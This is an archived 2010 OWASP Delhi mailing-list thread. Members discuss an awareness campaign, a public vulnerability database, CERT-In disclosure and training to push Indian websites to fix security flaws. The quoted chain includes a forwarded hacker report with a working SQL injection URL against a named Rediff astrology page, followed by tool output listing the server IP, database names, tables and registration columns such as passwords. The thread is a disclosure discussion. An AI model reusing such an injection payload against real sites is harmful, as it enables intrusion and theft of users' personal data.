[Owasp-delhi] "Jagorey" campaign for vulnerabilities on Indian Websites -- what's next?

Sripathi Krishnan sripathi.krishnan at gmail.com
Wed Jun 23 08:40:46 EDT 2010


I hate to see a conversation die down, so pushing it again.

Discussions so far -

   1. Vulnerability Database for Indian websites, or "hall of shame"
   2. Training/Awareness that OWASP members can volunteer for
   3. Should this involve CERT-IN or not?

I am definitely interested in (1) and (2), though I think (1) alone won't
get us the results.

What do others think? And how many people are willing to be involved in
something like this?

--Sri


On 16 June 2010 19:35, Don Cochran <dcochran at scippinternational.org> wrote:

>  Sri,
>
>
>
> I couldn’t agree more.  Your thoughts are spot-on.
>
>
>
> I’d be more than happy to offer our services in some form or fashion.  Like
> OWASP, SCIPP International was founded as a not-for-profit with the sole
> purpose of evangelizing security awareness.  Besides a traditional security
> awareness course geared towards the end-user we offer an awareness course
> targeted at those involved in the SDLC which we branded as SWADA or Secure
> Web-Application Development Awareness.
>
>
>
> Although the current SWADA course has been very well received for the past
> 18 months or so, we have decided to transform it in to 3 nested courses that
> build upon one another (sort like a college, 101, 20x  and 3xx series).
>  Within the next 45 – 60 days we are planning on phasing in the new courses
> and replacing the old one with a “series” of highly targeted awareness
> courses.
>
>
>
> The lowest level course (approx 1.5 hours) will introduces the participant
> to the Principles of Secure Coding (think of it as a 101 type of course) and
> is intended for everyone who has anything to do with the SDLC. Even though
> the course is an ANSI accredited certificate course, it is not intended to
> be a full-fledged training course, but mealy an introduction to terms,
> concepts and basic understanding of best business practices.  (We’ll have
> full outlines of the new courses posted on our web-site within the next week
> or two)
>
>
>
> The Into to Principles of Secure Coding course will be supplemented with a
> Managerial track (approx 1.5 - 2 additional hours) which will delve in to
> topics such as building security in to the SDLC (requirements gathering and
> analysis, system design, development and testing, acceptance, O&M and
> disposal) - Software Security Requirements; CLASP; Measuring Progress and
> Maturity of the SDLC. Of the 3 courses, this course is probably the most
> important as it will lead the learner in to understanding WHY security is so
> important to bake in – and not try to add on.  We’ll touch on how to get
> others to buy-in to the SDLC concept as well.  This is the one that meets
> your stated requirements below.
>
>
>
> After completing the two courses above, Technicians will be ready to be
> introduced to some specific vulnerabilities associated with
> web-applications.  The 3rd course will be our Technical track (approx an
> additional 2 hours) that will cover specific vulnerabilities found in the
> likes of the OWASP Top-10 and the CWE/SANS Top-25. Discussions will focus on
> each of the vulnerabilities and will help the learner identify if they have
> a knowledge gap.  Reference materials will be suggested to assist in
> furthering their knowledge as well technical training opportunities.
>
>
>
> I think you will agree, the courses outlined above will  really hit home
> with anyone who is involved with the SDLC – and would be perfect for firms
> who are dependent on business critical applications. I also think you will
> agree that everyone should embrace an awareness course such as this.
>
>
>
> If you are interested, let us know how we can help.
>
>
>
> Warm regards,
>
>
>
> Don Cochran
>
>
>
>
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Sripathi Krishnan
> *Sent:* Wednesday, June 16, 2010 8:30 AM
> *To:* dhruv.soi at torridnetworks.com; Sriram Lakshmanan
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> There is a problem with reporting vulnerabilities - every website has
> hundreds of them spread all over. Reporting all of them requires a herculean
> effort, and without a buy-in from the top management of the website, its not
> going to get fixed. Our collective interest will definitely fade if we don't
> see some action from the developers.
>
>
>
> The state our websites our in, we need action from higher management. If
> they don't support the initiative, there is just no way that individual
> teams/developers will fix hundreds of web pages. I strongly believe we need
> to influence the management to take an active interest in application
> security.
>
>
>
> So, instead of vulnerability database, I propose organizing training
> sessions for website owners/developers. Perhaps an India wide OWASP meet,
> with the stated goal of 'Increasing corporate awareness towards Application
> Security'. We can perhaps have a two day seminar, with sessions for business
> folks as well as for developers and testers.
>
>
>
> Getting sponsors should not be an issue. This also falls well within the
> purview of OWASP, so we won't have any legal/political issues. We can use
> our individual contacts to make sure most Indian portal owners are aware of
> this seminar and have adequate representation. And we can find a lot of
> people from this group to help out with the training material, seminars,
> presentations and such.
>
>
>
> I think that is the best use of the people in this group. Another database
> of vulnerabilities is not going to take us too far IMHO.
>
>
>
> --Sri
>
>  On 16 June 2010 15:16, Soi, Dhruv <dhruv.soi at torridnetworks.com> wrote:
>
> That sounds like government supportive lang., seems you have had a good
> time with them J No offensive though, I like that.
>
>
>
> I could better think of collective idea from Subhash’s and Sriram’s post to
> have a central portal dedicated towards web application breaches and flaws
> in India, just like WASC (which is for global). The count of vulnerabilities
> that WASC could build over 10 years for global websites, I am sure, we can
> build similar database for Indian web applications in around 1yr itself J
>
>
>
> We could think of a model where a vuln. is firstly reported to the owner
> and CERT-IN to show our responsibility for the provider. Thereafter, give
> some time window to fix the problem. If nothing happens in the window and/or
> there is no response from the owner, we show our responsibility for the
> consumer and publish it over the portal.
>
>
>
> We can further brainstorm keeping CERT-IN in loop to drive something
> fruitful. Connect me offline if anyone of you is interested to mature this
> idea, we can catch up somewhere in NCR, pitch this idea as an OWASP India
> Project, participate as volunteers, and do something good for owner,
> consumers and govt.
>
>
>
> Cheers!
>
> Dhruv
>
>
>
> *From:* Subhash Dutta [mailto:subhash.dutta at kriss.in]
> *Sent:* 16 June 2010 14:43
> *To:* Sriram Lakshmanan
>
>
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> I agree with this proposal.  My further suggestions:-
>
>  (a)  Involve CERT-In fully.  This will take care of the legal hassles as
> it is their mandate.
>  (b)  Follow some thing like responsible disclosure.  Sending vulnerability
> information through a central point of contact (preferably at CERT-In).
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sriram Lakshmanan" <sriram_lakshmanan at uhc.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>, "Subhash Dutta" <
> subhash.dutta at kriss.in>, "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> Cc: "owasp-delhi" <owasp-delhi at lists.owasp.org>
> Sent: Wednesday, June 16, 2010 1:51:28 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: RE: [Owasp-delhi] Rediff Astrology
>
>  I don't know if it can happen under the ageis of OWASP or not but maybe
> we need something like a Jagorey campaign and a "fall of shame". I'm banking
> on this group's collective wisdom to do something...
>
>    - The Jagorey like campaign is for the CxO forums who are often unware
>    of the problem in their own backyard as the tech manager never notified them
>    or didn't give them enough gyan (specially to CTO/CISO). Maybe leverage
>    NASSCOM for such forums (for contact points)
>    - The fall of shame is for sites we identity as "bad" weak thru
>    non-intriusive testing and advise the public about the risks of the weakness
>    exists even after notification to the company. I understand such a list
>    opens up more hacks/attacks, and thus we can refrain from displaying the
>    vulnerable url and details on the attack. CERT-in may be leveraged for this.
>    I also do not know the complete legal interpretation of such a move (which
>    may include defamation suits)
>
> The point I'm trying to make is we know we have issues, with corporate
> indfifference to security, with laws that are not enforced well, with
> "security people" just doing what I call "khanapoorti" i.e action for the
> sake of it. The problems will not go away. As a responsibile community can
> we create a task force and collectively do something?. I do understand the
> individual efforts like Nilesh's / Sripathi's or Subhash's and others have
> fallen on deaf ears and is frustrating....maybe concerted and joint efforts
> will bear fruits.
>
>
>
> Additional thoughts/comments/feedback...
>
>
>
>  PS: I use Jagorey like as refernce, as Jagorey campaign is a TV advt
> showing a movement against corruption.
>
>
>
> warm regards,
>
> Sriram
>
> *SEC**_**R**_**TY. **U** &* *I** *are in it together. Everyone’s
> responsible - Everywhere
>
>
>
>
>  ------------------------------
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Soi, Dhruv
> *Sent:* Wednesday, June 16, 2010 12:44 PM
> *To:* 'Subhash Dutta'; 'Sripathi Krishnan'
> *Cc:* 'owasp-delhi'
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
> Old saying and a song – “It happens only in India”. Till the time laws
> aren’t enforced with a force, no one is bothered about security. Even laws
> can be bypassed here, but atleast few would be trapped to set the example
> for others.
>
>
>
> When I explain India InfoSec to the friends abroad, I generally blame the
> Indian mindset. Bike Riders here don’t care about their personal security
> and wear helmets only when there is strict police checking. Same is with the
> car drivers for their seat belts. In Delhi, we find better police checking
> so people are serious, but in other areas like Noida, no one cares. In a
> nutshell, only strict laws can help Corporate India to be secure and deliver
> secure.
>
>
>
>
>
> *From:* owasp-delhi-bounces at lists.owasp.org [mailto:
> owasp-delhi-bounces at lists.owasp.org] *On Behalf Of *Subhash Dutta
> *Sent:* 16 June 2010 09:09
> *To:* Sripathi Krishnan
> *Cc:* owasp-delhi
> *Subject:* Re: [Owasp-delhi] Rediff Astrology
>
>
>
> Yes I have also noted the same. In fact, the imint card company stores
> passwords as reversible encrypted and will tell you in plain text what your
> password is in case you have forgotten it ;).  When brought to their notice,
> I received a standard reply - Thanking for contacting us, we will get back
> to you shortly.  Nobody has got back till date (1 year past).  I think
> strong legislative punitive measures are the only solution.
>
> Regards
>
> Subhash Dutta
>
>
> ----- Original Message -----
> From: "Sripathi Krishnan" <sripathi.krishnan at gmail.com>
> To: "dhruv soi" <dhruv.soi at owasp.org>
> Cc: owasp-delhi at lists.owasp.org, owasp-mumbai at lists.owasp.org,
> owasp-bangalore at lists.owasp.org
> Sent: Monday, June 14, 2010 11:25:23 PM GMT +05:30 Chennai, Kolkata,
> Mumbai, New Delhi
> Subject: Re: [Owasp-delhi] Rediff Astrology
>
> Its not just rediff.com, almost all other Indian portals - in.com,
> indiatimes.com and sify.com have similar problems. XSS, XSRF, SQL
> Injection, Poor password/session management, open redirects .. the list is
> endless.
>
>
>
> I have written to each of the above portals several times in the past year,
> and have given up. IMHO, they are not interested in securing their websites.
>
>
>
> --Sri
>
> On 14 June 2010 23:17, Soi, Dhruv <dhruv.soi at owasp.org> wrote:
>
> Another one to notify Rediff that readers’ daily fortune can be fixed by
> someone…Seems Rediff needs a lot of OWASP, do inform them that its free!!
>
>
>
> *From:* “Jack H4xor”
> *Sent:* 14 June 2010 12:07
> *To:* dhruv.soi at owasp.org
> *Subject:* Rediff Astrology
>
>
>
> y0,
>
>
> h0rr1bl3 th4n h0rr0r
>
> Vulnerable Url :
>
>
> http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Scorpiox%27%20OR%201=convert%28int,@@version%29--
>
>
>
> ********************************************************************
>
>
>
>
>
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> +     -==  MSSQL Information Schema astrology.rediff.com  ==-     +
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] URL : http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> diac=Scorpiox'
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Date: Tue May 18 20:58:26 2010
>
>
>
>
>
>
>
> [ + ] Displaying information about MSSQL host !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] @@VERSION  :      Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>                         Aug  6 2000 00:57:48
>
>
>
>
>
>
>
>                         Copyright (c) 1988-2000 Microsoft Corporation
>
>
>
>
>
>
>
>                         Standard Edition on Windows NT 5.0 (Build 2195: Service
>
>
>
>
>
>
>
> Pack 4)
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] USER ()          : dbo
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] S_USER ()        : astrology
>
>
>
>
>
>
>
> [ + ] DB_NAME ()       : astro
>
>
>
>
>
>
>
> [ + ] HOST_NAME ()     : ASTROLOGY
>
>
>
>
>
>
>
> [ + ] SERVER_NAME ()   : SEARCHDB
>
>
>
>
>
>
>
> [ + ] SERVER_TYPE ()   : Microsoft-IIS/6.0
>
>
>
>
>
>
>
> [ + ] X-POWERED-By ()  : ASP.NET
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] IP_ADDRESS_INFO  : 202.54.124.173
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ - ] We Can't get number of Databases !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] Start dumping database Names !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] But first choice number of DB to dump :> 20
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Displaying list of 20 databases on this MSSQL host !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 0 ]        : astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 1 ]        : master
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 2 ]        : tempdb
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 3 ]        : model
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 4 ]        : msdb
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 5 ]        : pubs
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 6 ]        : Northwind
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 7 ]        : travel
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 8 ]        : travel_int
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 9 ]        : astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 10 ]        : Jobsearch
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 11 ]        : astroyogiD
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 12 ]        : matrimonial
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 13 ]        : investornew
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ DATABASE: 14 ]        : test
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] Vulnerability Database is   :  astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Displaying Tables inside DB :> astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] Numbers of Tables To Dispaly ?
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Specify Numbers   :> 200
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 0 ]          : ALLIANCE_PARTNER_COMMISSION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 1 ]          : ALLIANCE_PARTNER_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 2 ]          : astrolove
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 3 ]          : astroparent
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 4 ]          : CITY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 5 ]          : COMPLETE_ORDER_DETAIL
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 6 ]          : COMPLETE_SUBSCRIPTION_DETAIL
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 7 ]          : COUNTRY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 8 ]          : CUSTOMER_CARE_DETAILS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 9 ]          : CUSTOMER_CARE_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 10 ]          : CUSTOMER_PERSON1
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 11 ]          : CUSTOMER_PERSON2
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 12 ]          : CUSTOMER_PERSON3
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 13 ]          : darshtest
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 14 ]          : dtproperties
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 15 ]          : FENGSHUI
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 16 ]          : FRANCHISEE_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 17 ]          : idealmate
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 18 ]          : INTERNATIONAL_PARTNER_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 19 ]          : NUMEROLOGY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 20 ]          : ORDER_DETAILS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 21 ]          : ORDER_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 22 ]          : ORDER_REMARKS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 23 ]          : ORDERS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 24 ]          : p1
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 25 ]          : p3master
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 26 ]          : PALMISTRY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 27 ]          : PAYMENT_METHOD_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 28 ]          : PROBLEM_ANSWER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 29 ]          : PROBLEM_CATEGORY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 30 ]          : REGISTRATION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 31 ]          : SHIPPING_DETAILS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 32 ]          : SPCFIC_ANLYS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 33 ]          : SUBSCRIBER_DETAILS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 34 ]          : SUBSCRIBER_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 35 ]          : SUBSCRIBER_REGISTRATION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 36 ]          : SUBSCRIBER_TRANSACTION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 37 ]          : SUBSCRIPTION_DETAILS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 38 ]          : SUBSCRIPTION_MASTER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 39 ]          : sysconstraints
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 40 ]          : syssegments
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 41 ]          : test
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 42 ]          : USER_ASTROLOGER_PRODUCT_TRANSACTION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ TABLES: 43 ]          : zodiac
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Done !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Start dumping all Columns from table :> REGISTRATION
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] Numbers of Columns To Display ?
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Specify Numbers    :> 50
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 0 ]         : FRANCHISEE_ID
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 1 ]         : PARTNER_ID
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 2 ]         : REGISTRATION_ADDRESS
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 3 ]         : REGISTRATION_BIRTH_COUNTRY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 4 ]         : REGISTRATION_BIRTH_DATE
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 5 ]         : REGISTRATION_BIRTH_PLACE
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 6 ]         : REGISTRATION_BIRTH_TIME_HOUR
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 7 ]         : REGISTRATION_BIRTH_TIME_MINUTES
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 8 ]         : REGISTRATION_CELL_NO
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 9 ]         : REGISTRATION_COUNTRY
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 10 ]         : REGISTRATION_DATE
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 11 ]         : REGISTRATION_EMAIL_ID
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 12 ]         : REGISTRATION_FIRSTNAME
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 13 ]         : REGISTRATION_GENDER
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 14 ]         : REGISTRATION_ID
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 15 ]         : REGISTRATION_IP
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 16 ]         : REGISTRATION_LASTNAME
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 17 ]         : REGISTRATION_PASSWORD
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 18 ]         : REGISTRATION_TELEPHONE_NO
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ COLUMNS : REGISTRATION ] 19 ]         : REGISTRATION_USERNAME
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] Done !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ! ] All information was recorded in astrology.rediff.com.txt file !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ 1 ] : Return to Tables  !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ 2 ] : Return to Columns !
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> [ ? ] : Oprion :>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> Thanks & Regards
>
>
>
>
>
>
>
> Jackh4xor
>
>
>
>
>
>
>
> ( h4cky0u )
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
>
> _______________________________________________ Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
> This e-mail, including attachments, may include confidential and/or
>
> proprietary information, and may be used only by the person or entity
>
> to which it is addressed. If the reader of this e-mail is not the intended
>
> recipient or his or her authorized agent, the reader is hereby notified
>
> that any dissemination, distribution or copying of this e-mail is
>
> prohibited. If you have received this e-mail in error, please notify the
>
> sender by replying to this message and delete this e-mail immediately.
>
>
> _______________________________________________
> Owasp-delhi mailing list
> Owasp-delhi at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-delhi
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20100623/460ab9bb/attachment-0001.html 


More information about the Owasp-delhi mailing list